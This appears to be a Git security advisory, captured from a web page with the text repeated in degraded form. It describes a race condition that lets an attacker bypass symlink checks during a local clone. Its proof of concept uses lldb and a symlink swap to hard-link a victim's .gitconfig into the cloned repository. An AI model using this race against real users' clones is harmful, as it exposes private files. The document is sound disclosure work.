Summary
When cloning a local source repository that contains symlinks via the
filesystem, Git may create hardlinks to arbitrary user-readable files on the
same filesystem as the target repository in the objects/ directory.
Details
Cloning a local repository over the filesystem may create hardlinks to
arbitrary user-owned files on the same filesystem in the target Git
repository's objects/ directory.
When cloning a repository over the filesystem (without explicitly specifying
the file:// protocol or --no-local), the optimizations for local cloning
will be used, which include attempting to hard link the object files instead of
copying them.
While the code includes checks against symbolic links in the source repository,
which were added during the fix for CVE-2022-39253, these checks can still be
raced because the hard link operation ultimately follows symlinks. If the
object on the filesystem appears as a file during the check, and then a symlink
during the operation, this will allow the adversary to bypass the check and
create hardlinks in the destination objects directory to arbitrary,
user-readable files.
PoC
Since the code will stop attempting to create hard links after the first
failure, it is easiest to repro against a repository with just a single object.
- Create a repository with an object:
```
mkdir simplerepo
cd simplerepo
git init
echo 'bla' | git hash-object -w --stdin
cd ..
git clone simplerepo --bare
```
- Debug the cloning of that repository over an NFS mount, and break
on link:
```
% lldb -- $GITBINARY clone /tmp/mount/simplerepo.git cloned
(lldb) b --one-shot true --name link
(lldb) r
...
(lldb) p (char*)$x0
(char *) 0x00006000034c0180 "/private/tmp/mount/simplerepo.git/objects/a7/f8d9e5dcf
(lldb) p (char*)$x1
(char *) 0x00006000034c0100 "cloned/.git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029
```
- From the NFS server, replace the file in the source repository with
a symbolic link to any of the victim's files on the same mount
point they are cloning to:
```
% rm -f objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b
% ln -s /Users/certl/.gitconfig objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b
```
- Continue the clone, observing afterwards as the victim that the
.git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b file is a
hard link to the location as specified in the symlink created by
the attacker in the previous step:
```
(lldb) c
(lldb) q
% ls -i cloned/.git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b
31241553 cloned/.git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b
% ls -i /Users/certl/.gitconfig
31241553 /Users/certl/.gitconfig
```
Impact
An adversary can cause the user to hardlink arbitrary files into their
repository's objects/ directory.
This issue has originally been reported by Apple Security Engineering and Architecture (SEAR).
pks-t Remediation developer
Summary
When cloning a local source repository that contains symlinks via the
filesystem, Git may create hardlinks to arbitrary user-readable files on the
same filesystem as the target repository in the
objects/directory.Details
Cloning a local repository over the filesystem may create hardlinks to
arbitrary user-owned files on the same filesystem in the target Git
repository's
objects/directory.When cloning a repository over the filesystem (without explicitly specifying
the
file://protocol or--no-local), the optimizations for local cloningwill be used, which include attempting to hard link the object files instead of
copying them.
While the code includes checks against symbolic links in the source repository,
which were added during the fix for CVE-2022-39253, these checks can still be
raced because the hard link operation ultimately follows symlinks. If the
object on the filesystem appears as a file during the check, and then a symlink
during the operation, this will allow the adversary to bypass the check and
create hardlinks in the destination objects directory to arbitrary,
user-readable files.
PoC
Since the code will stop attempting to create hard links after the first
failure, it is easiest to repro against a repository with just a single object.
on link:
a symbolic link to any of the victim's files on the same mount
point they are cloning to:
.git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260bfile is ahard link to the location as specified in the symlink created by
the attacker in the previous step:
Impact
An adversary can cause the user to hardlink arbitrary files into their
repository's
objects/directory.This issue has originally been reported by Apple Security Engineering and Architecture (SEAR).